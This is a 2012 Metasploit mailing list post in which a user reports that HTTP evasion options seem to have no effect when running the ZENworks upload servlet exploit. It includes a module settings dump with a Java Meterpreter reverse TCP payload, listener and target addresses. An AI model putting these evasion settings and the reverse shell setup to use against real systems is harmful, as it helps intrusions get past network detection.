Metasploit mailing list archives

HTTP Evasions not working as intended


From: Ashish Joshi <joshi.ashish22 () gmail com>
Date: Fri, 6 Jan 2012 15:41:29 +0530

Hi,

I am trying to use various HTTP evasions for some HTTP server based
exploits (say exploit/windows/http/zenworks_uploadservlet) or similar
exploits. I am making use of the various evasions supported. However, when I
run the exploit, I don’t see any difference between a normal exploitation and
an evasive exploitation. I checked the respective pcaps and they all look the
same. I have tried using the following evasions:

HTTP::method_random_case
HTTP::uri_fake_end
HTTP::pad_fake_headers

.. and a couple more.

Here is my config:

msf  exploit(zenworks_uploadservlet) > set

Global
======

No entries in data store.

Module: windows/http/zenworks_uploadservlet
===========================================

  Name                          Value
  ----                          -----
  EnableUnicodeEncoding         true
  FingerprintCheck              false
  HTTP::header_folding          false
  HTTP::method_random_case      true
  HTTP::method_random_invalid   false
  HTTP::method_random_valid     false
  HTTP::pad_fake_headers        false
  HTTP::pad_fake_headers_count  0
  HTTP::pad_get_params          false
  HTTP::pad_get_params_count    16
  HTTP::pad_method_uri_count    1
  HTTP::pad_method_uri_type     space
  HTTP::pad_post_params         false
  HTTP::pad_post_params_count   16
  HTTP::pad_uri_version_count   1
  HTTP::pad_uri_version_type    space
  HTTP::uri_dir_fake_relative   false
  HTTP::uri_dir_self_reference  false
  HTTP::uri_encode_mode         hex-normal
  HTTP::uri_fake_end            true
  HTTP::uri_fake_params_start   false
  HTTP::uri_full_url            false
  HTTP::uri_use_backslashes     false
  InitialAutoRunScript
  LHOST                         10.204.136.1
  LPORT                         4444
  PAYLOAD                       java/meterpreter/reverse_tcp
  RHOST                         8.0.0.101
  RPORT                         80
  TARGET                        0
  UserAgent                     Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  VERBOSE                       false
  WfsDelay                      0

This doesn’t seem to be working. Is there any bug related to it? I checked
the bug-tracker and couldn’t find a relevant one.

How do I make it work? Any help would be appreciated.

Thanks,
Ashish